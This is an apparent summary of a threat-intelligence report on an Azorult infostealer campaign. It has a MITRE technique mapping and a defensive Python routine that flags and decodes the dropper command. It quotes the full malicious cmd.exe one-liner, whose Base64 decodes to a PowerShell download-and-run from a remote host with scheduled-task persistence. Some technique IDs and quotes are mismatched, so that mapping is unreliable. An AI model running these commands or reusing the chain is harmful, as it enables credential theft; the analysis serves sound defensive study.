Sneaky Azorult Back In Action And Goes Undetected – Cyble

Azorult malware makes a stealthy return with a multistage, memory-resident infection chain that starts from a ZIP containing a malicious LNK file masquerading as a PDF. The campaign uses obfuscated PowerShell, a batch dropper launched via Task Scheduler, and a loader fetched from a remote server to execute Azorult entirely in memory, avoiding disk traces. hashtags: #Azorult #PowerShell #LNK #InMemoryExecution #Loader #Cyble

Keypoints

  • Azorult re-emerges as an information-stealer with memory-only execution to evade disk-based detection.
  • Infection chain begins with a ZIP containing a malicious shortcut (.lnk) disguised as a PDF.
  • The shortcut runs a cmd.exe one-liner that writes a Base64 blob to a batch file, decodes it with certutil, and registers the batch file as a Task Scheduler task that launches an obfuscated PowerShell command.
  • A loader is downloaded from a remote server, shellcode is injected, and the loader is executed in memory.
  • A second PowerShell script triggers the final Azorult payload, with all stages kept in memory.
  • The campaign leverages mutexes, anti-VM checks, registry queries (MachineGuid), and COM/CLR-based loading to hinder analysis.

MITRE Techniques

  • [T1059.003] Windows Command Shell – The infection chain uses cmd.exe to execute commands from the shortcut file. Quote: "C:\Windows\System32\cmd.exe" /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcgLU91dEZpbGUgJyV0ZW1wJVxmcW5JT1FkUi5qcyc7IHNjaHRhc2tzIC9kZWxldGUgL2YgL3RuIG41ZE1tSkVCWWM7IHdzY3JpcHQgJXRlbXAlXGZxbklPUWRSLmpzIg== > KgZvPA3S.bat & certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat & schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr "C:\Users\MALWOR~1\AppData\Local\Temp\KgZvPA3S.bat"
  • [T1059.001] PowerShell – The batch file decodes a Base64 payload and triggers subsequent PowerShell-based stages. Quote: start /min powershell -command "IWR 'hxx://nrgtik.mx/wp-content/uploads/wp-content.php' -OutFile '%temp%\fqnIOQdR.js'; schtasks /delete /tn n5dMmJEBYc; wscript %temp%\fqnIOQdR.js"
  • [T1027.001] Obfuscated/Compressed Files and Information – Base64-encoded payloads decoded via certutil. Quote: "Base64 encoded string. The command then creates a scheduled task … and executes newly dropped fqnIOQdR.js"
  • [T1053.005] Scheduled Task – Task Scheduler is used to repeatedly run the batch script every minute. Quote: “schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr …”
  • [T1105] Ingress Tool Transfer – Loader is downloaded from a remote server. Quote: “downloading an additional loader from a remote server, injecting shellcode, and executing the loader.”
  • [T1055] Process Injection – Shellcode is injected and the loader is executed in a newly created thread. Quote: “injects a hardcoded shellcode which subsequently executes the loader.”
  • [T1105.001] Windows Script Host (WSH): wscript – The loader executes the downloaded JavaScript/JS file via WScript. Quote: "wscript %temp%\fqnIOQdR.js"
  • [T1113] Screen Capture – Azorult captures screenshots as part of data collection. Quote: “The malware specifically targets Mozilla Firefox, Google Chrome, Microsoft Edge, Brave, and Opera. The figure below shows the routine to capture screenshot.”
  • [T1082] System Information Discovery – The systeminfo() method gathers host details. Quote: “systeminfo() method … collects system details”
  • [T1555.003] Credentials from Web Browsers – The malware targets browser-stored credentials. Quote: “The table below lists the wallets targeted by the binary” and “Credentials from web browsers”
  • [T1083] File and Directory Discovery – The malware discovers application files/directories. Quote: "File and Directory Discovery (T1083) … Azorult can discover Application files and directories"
  • [T1059.005] Windows Script: PowerShell-based loader – PowerShell-based loading components via agent1.ps1 and agent3.ps1. Quote: “The second PowerShell script, ‘agent3.ps1’, functions as a loader.”
  • [TA0000] Exfiltration Over C2 Channel – Data is compressed/encrypted and sent to C2. Quote: “The data is compressed and encrypted before sending it to the server.”
  • [TA0011] Command and Control – Non-Application Layer Protocol (T1095) – The loader communicates with C2 and uses TCP for C2. Quote: “Non-Application Layer Protocol (T1095) … TCP for C&C communication”
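As an added example (not code from the Cyble report), a small Python triage routine that runs over a process command line modeled on the cmd.exe one-liner quoted in the T1059.003 entry: it flags the certutil-decode and minute-interval scheduled-task markers and decodes the echoed Base64 so the hidden PowerShell/wscript stage is visible to the analyst.

```python
import base64
import re
import string

# Constructed sample for this example: the cmd.exe one-liner quoted above with its
# path backslashes restored. It is not a live capture from a host.
SAMPLE_CMDLINE = (
    'C:\\Windows\\System32\\cmd.exe /c echo '
    'c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14'
    'L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcgLU91dEZpbGUgJyV0ZW1wJVxm'
    'cW5JT1FkUi5qcyc7IHNjaHRhc2tzIC9kZWxldGUgL2YgL3RuIG41ZE1tSkVCWWM7IHdzY3Jp'
    'cHQgJXRlbXAlXGZxbklPUWRSLmpzIg== '
    '> KgZvPA3S.bat & certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat '
    '& schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc '
    '/tr "C:\\Users\\MALWOR~1\\AppData\\Local\\Temp\\KgZvPA3S.bat"'
)

INDICATORS = {  # stage markers from the chain above, matched case-insensitively
    "certutil_decode": r"certutil(\.exe)?\s+(-f\s+)?-decode\b",
    "minute_task": r"schtasks\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b",
    "echo_to_bat": r"\becho\s+\S+\s*>\s*\S+\.bat\b",
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
NEXT_STAGE = ("powershell", "iwr", "wscript", "schtasks /delete")


def decode_embedded_base64(cmdline):
    """Decode every long Base64 run that yields printable text (the hidden stage)."""
    decoded = []
    for match in B64_RUN.finditer(cmdline):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except ValueError:  # not valid Base64 or not UTF-8: skip this run
            continue
        if all(ch in string.printable for ch in text):
            decoded.append(text)
    return decoded


def analyze_cmdline(cmdline):
    """Score one process command line and return the evidence an analyst needs."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, cmdline, re.I)]
    decoded = decode_embedded_base64(cmdline)
    lowered = " ".join(decoded).lower()
    next_stage = [kw for kw in NEXT_STAGE if kw in lowered]
    # Two LOLBin markers plus a decodable next stage is the chain, not a one-off.
    return {"indicators": hits, "decoded": decoded, "next_stage": next_stage,
            "suspicious": len(hits) >= 2 and bool(next_stage)}
```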

Indicators of Compromise


Read more: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/